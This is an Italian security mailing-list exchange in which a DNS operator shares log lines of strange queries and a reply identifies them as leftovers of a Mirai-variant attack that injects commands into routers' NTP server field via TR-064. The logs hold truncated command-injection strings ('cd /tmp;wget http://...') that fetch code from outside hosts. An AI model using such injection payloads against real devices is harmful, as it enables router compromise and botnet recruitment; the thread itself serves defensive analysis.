Re: [ml] Strane query DNS

Tue, 21 Feb 2017 09:13:51 -0800 

Penso sia l'effetto collaterale di un tentativo di compromissione di
router DSL da parte di un fork di mirai (roba dello scorso novembre).

L'attacco prevede di sfruttare una RCE nell'implementazione di ntpd in
alcuni firmware. I comandi vengono iniettati via TR-064 nel campo di
configurazione che dovrebbe contenere l'indirizzo del server di
riferimento orario: se il firmware e' vulnerabile, la stringa viene
interpretata, altrimenti... viene eseguita una query dns per quel
"nome" per tentare di contattare il server ntp.

Penso che x.y.z.k, e.f.g.h e a.b.c.d siano router DSL con TR-064
aperto la cui implementazione di ntpd non e' vulnerabile.

Ciao


Fabio

2017-02-14 15:25 GMT+01:00 Lorenzo Mainardi <[email protected]>:
> Buonasera a tutti,
> gestisco un server DNS cache per diverse migliaia di utenti broadband e mi
> ritrovo nei log delle query di questo tipo:
>
> 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? `cd
> /tmp;wget http://105.226.91.155. (53)
> 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? `cd
> /tmp;wget http://105.226.91.155. (53)
> 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? `cd
> /tmp;wget http://105.226.91.155. (53)
> 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd
> /tmp;wget http://36.107.97.237:. (53)
> 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? `cd
> /tmp;wget http://84.9.195.97:27. (53)
> 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? `cd
> /tmp;wget http://2.186.193.103:. (53)
> 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? `cd
> /tmp;wget http://2.186.193.103:. (53)
> 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? `cd
> /tmp;wget http://2.186.193.103:. (53)
>
> Che cosa pensate possano essere? Tentativi di command injection?
> รจ la prima volta che mi capita di vedere delle query del genere.
>
> --
> LORENZO MAINARDI
>
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Rispondere a